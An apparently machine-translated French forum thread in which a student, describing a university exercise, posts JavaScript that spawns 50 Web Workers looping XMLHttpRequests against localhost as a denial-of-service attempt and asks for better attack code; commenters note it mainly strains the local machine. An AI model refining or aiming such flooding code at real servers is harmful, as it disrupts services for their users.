1
à l'université, nous avons eu un peu de "devoirs" pour tenter d'exécuter une attaque par déni de service. J'ai décidé d'aller un peu différemment alors oters. J'ai essayé de l'exécuter en utilisant JavaScript.JavaScript attaque DoS utilisant WebWorkers
Les questions sont les suivantes:
- Est-il même possible à cela?
- Si je fais HttpRequest sur le bouclage vais-je voir le résultat par l'inaccessibilité de tous les sites Web causés par le port http débordant?
- Y a-t-il un meilleur code pour faire cela que le mien?
index.html:
<script>
for(var i = 0; i< 50; i++) {
worker = new Worker("worker.js");
worker.postMessage('Hello World');
}
</script>
worker.js:
self.addEventListener('message', function(e) {
while(1) {
var xmlHttp = new XMLHttpRequest();
xmlHttp.onreadystatechange = function() {
if (xmlHttp.readyState == 4 && xmlHttp.status == 200)
callback(xmlHttp.responseText);
}
xmlHttp.open("GET", "http://127.0.0.1", true);
xmlHttp.send(null);
}
}, false);
Merci pour toute entrée!
Je ne suis pas sûr, mais qui est plus susceptible de planter votre propre ordinateur que serveur distant (si vous choisissez autre que localhost) 'while (1)' – mehulmpt
Que s'est-il passé lorsque vous avez exécuté le code affiché? Le navigateur était-il cool avec le 'while (1)'? – nnnnnn
@nnnnnn Le navigateur semblait aller bien puisque les web workers ont tout fait derrière la scène. Dans l'outil de développement, vous pouvez clairement voir que les demandes sont envoyées, mais je pourrais aller à n'importe quel site Web que je voulais sans aucun problème. – TomasB